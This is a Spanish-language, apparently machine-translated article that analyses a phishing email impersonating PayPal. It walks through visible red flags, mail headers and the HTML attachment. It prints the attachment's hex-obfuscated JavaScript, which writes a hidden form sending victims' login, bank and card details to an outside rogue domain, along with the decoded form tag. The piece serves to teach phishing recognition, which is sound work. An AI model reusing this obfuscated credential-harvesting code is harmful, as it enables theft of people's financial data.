10Sep
En el mundo de hoy donde la información de todos está en línea, el phishing es uno de los ataques en línea más populares y devastadores, porque siempre puedes limpiar un virus, pero si te roban los datos bancarios, estás en problemas. Aquí hay un desglose de uno de esos ataques que recibimos.
No piense que son solo sus datos bancarios los que son importantes: después de todo, si alguien obtiene control sobre el inicio de sesión de su cuenta, no solo conoce la información contenida en esa cuenta, sino que la misma información de inicio de sesión puede usarse en variosotras cuentas. Y si ponen en peligro su cuenta de correo electrónico, pueden restablecer todas sus otras contraseñas.
Por lo tanto, además de mantener contraseñas seguras y variables, siempre debe estar atento a correos electrónicos falsos que se hacen pasar por reales. Si bien la mayoría de los intentos de phishing son de aficionados, algunos son bastante convincentes, por lo que es importante comprender cómo reconocerlos a nivel de superficie y cómo funcionan bajo el capó.
Imagen de asirap
Examen de lo que está a la vista
Nuestro correo electrónico de ejemplo, al igual que la mayoría de los intentos de phishing, le "notifica" de actividad en su cuenta de PayPal que, en circunstancias normales, sería alarmante. Por lo tanto, el llamado a la acción es verificar / restaurar su cuenta mediante el envío de casi toda la información personal que se pueda imaginar. De nuevo, esto es bastante formulista.
Aunque ciertamente existen excepciones, casi todos los correos electrónicos de estafa y estafa se cargan con banderas rojas directamente en el mensaje. Incluso si el texto es convincente, generalmente puede encontrar muchos errores en el cuerpo del mensaje que indican que el mensaje no es legítimo.
El cuerpo del mensaje
A primera vista, este es uno de los mejores correos electrónicos de phishing que he visto. No hay errores ortográficos o gramaticales y la verborrea se lee de acuerdo con lo que cabría esperar. Sin embargo, hay algunas banderas rojas que puede ver cuando examina el contenido un poco más de cerca.
- "Paypal" - El caso correcto es "PayPal"( capital P).Puede ver que ambas variaciones se usan en el mensaje. Las empresas son muy deliberadas con su marca, por lo que es dudoso que algo así pase el proceso de prueba.
- "allow ActiveX": ¿Cuántas veces ha visto un negocio legítimo basado en web del tamaño de Paypal usar un componente propietario que solo funciona en un solo navegador, especialmente cuando admiten varios navegadores? Claro, en algún lugar por ahí alguna compañía lo hace, pero esta es una bandera roja.
- "de forma segura". Observe cómo esta palabra no se alinea en el margen con el resto del texto del párrafo. Incluso si estiro la ventana un poco más, no se ajusta o no se abre correctamente.
- "Paypal!": El espacio antes del signo de exclamación parece incómodo. Solo otra peculiaridad que estoy seguro no sería en un correo legítimo.
- "PayPal: formulario de actualización de cuenta.pdf.htm": ¿por qué Paypal adjuntaría un "PDF", especialmente cuando podrían vincular una página en su sitio? Además, ¿por qué intentarían disfrazar un archivo HTML como un PDF?Esta es la bandera roja más grande de todas.
El encabezado del mensaje
Cuando eche un vistazo al encabezado del mensaje, aparecerán un par de indicadores rojos más:
- La dirección de origen es [email protected].
- Falta la dirección a. No lo descarté, simplemente no es parte del encabezado del mensaje estándar. Normalmente, una empresa que tenga su nombre le personalizará el correo electrónico.
El archivo adjunto
Cuando abro el archivo adjunto, puede ver inmediatamente que el diseño no es correcto ya que le falta información de estilo. Una vez más, ¿por qué PayPal enviará un correo electrónico con un formulario HTML cuando podrían simplemente darle un enlace en su sitio?
Nota: utilizamos el visor de adjuntos HTML incorporado de Gmail para esto, pero le recomendamos que NO ABRA los archivos adjuntos de los estafadores. Nunca. Nunca. Muy a menudo contienen exploits que instalarán troyanos en tu PC para robar la información de tu cuenta.
Al desplazarse un poco más, puede ver que este formulario solicita no solo nuestra información de inicio de sesión de PayPal, sino también la información bancaria y de la tarjeta de crédito. Algunas de las imágenes están rotas.
Es obvio que este intento de phishing va tras todo de una sola vez.
El desglose técnico
Si bien debería ser bastante claro en base a lo que se ve a simple vista que se trata de un intento de phishing, ahora vamos a desglosar la composición técnica del correo electrónico y ver qué podemos encontrar.
Información del archivo adjunto
Lo primero que debe observar es el origen HTML del formulario adjunto, que es el que envía los datos al sitio falso.
Al ver rápidamente la fuente, todos los enlaces aparecen válidos ya que apuntan a "paypal.com" o "paypalobjects.com", que son legítimos.
Ahora vamos a echar un vistazo a la información básica de la página que Firefox reúne en la página.
Como puede ver, algunos de los gráficos se extraen de los dominios "blessedtobe.com", "goodhealthpharmacy.com" y "pic-upload.de" en lugar de los legítimos dominios de PayPal.
Información de los Encabezados de Correo Electrónico
A continuación veremos los encabezados de los mensajes de correo electrónico sin formato. Gmail lo hace disponible a través de la opción de menú Mostrar original en el mensaje.
Al mirar la información del encabezado para el mensaje original, puede ver que este mensaje fue compuesto usando Outlook Express 6. Dudo que PayPal tenga alguien en el personal que envíe cada uno de estos mensajes manualmente a través de un cliente de correo electrónico desactualizado.
Ahora mirando la información de enrutamiento, podemos ver la dirección IP tanto del remitente como del servidor de correo de retransmisión.
La dirección IP de "Usuario" es el remitente original. Al hacer una búsqueda rápida de la información de IP, podemos ver que el IP de envío está en Alemania.
Y cuando miramos la dirección IP del servidor de correo de retransmisión( mail.itak.at), podemos ver que se trata de un ISP con sede en Austria. Dudo que PayPal enrute sus correos electrónicos directamente a través de un ISP con sede en Austria cuando tienen una granja de servidores masiva que fácilmente podría manejar esta tarea.
¿A dónde van los datos?
Por lo tanto, hemos determinado claramente que se trata de un correo electrónico de suplantación de identidad( phishing) y recopilamos cierta información acerca de dónde se originó el mensaje, pero ¿qué ocurre con el lugar donde se envían sus datos?
Para ver esto, primero tenemos que guardar el archivo adjunto HTM en nuestro escritorio y abrirlo en un editor de texto. Al desplazarnos, todo parece estar en orden, excepto cuando llegamos a un bloque Javascript que parece sospechoso.
Al descifrar el origen completo del último bloque de Javascript, vemos:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for( i = 0; i & lt; x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;
Cada vez que ve una gran cantidad de letras y números aparentemente aleatorios incrustados en un bloque Javascript, generalmente es algo sospechoso. Al observar el código, la variable "x" se establece en esta cadena grande y luego se decodifica en la variable "y".El resultado final de la variable "y" se escribe en el documento como HTML.
Puesto que la cadena grande está hecho de números 0-9 y las letras AF, lo más probable es codificada a través de un simple ASCII a la conversión Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Traduce a:
& lt; nombre de formulario = id”principal” =”principal”method = "post" action = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
No es una coincidencia que esto decodifique en una etiqueta válida de formulario HTML que envíe los resultados no a PayPal, sino a un sitio deshonesto.
Además, cuando ve el origen HTML del formulario, verá que esta etiqueta de formulario no está visible porque se genera dinámicamente a través del Javascript. Esta es una manera inteligente de ocultar lo que el HTML realmente está haciendo si alguien simplemente viera el origen generado del archivo adjunto( como lo hicimos anteriormente) en lugar de abrir el archivo adjunto directamente en un editor de texto.
Ejecutando un whois rápido en el sitio ofensivo, podemos ver que este es un dominio alojado en un popular servidor web, 1and1.
Lo que se destaca es que el dominio usa un nombre legible( en lugar de algo como "dfh3sjhskjhw.net") y el dominio se ha registrado durante 4 años. Debido a esto, creo que este dominio fue secuestrado y utilizado como un peón en este intento de phishing.
El cinismo es una buena defensa
Cuando se trata de mantenerse seguro en línea, nunca está de más tener un poco de cinismo.
Aunque estoy seguro de que hay más señales de alerta en el correo electrónico de ejemplo, lo que hemos señalado anteriormente son indicadores que vimos después de unos pocos minutos de examen. Hipotéticamente, si el nivel de la superficie del correo electrónico imitara su homólogo legítimo al 100%, el análisis técnico aún revelaría su verdadera naturaleza. Es por eso que es importante poder examinar tanto lo que puede ver como lo que no puede ver.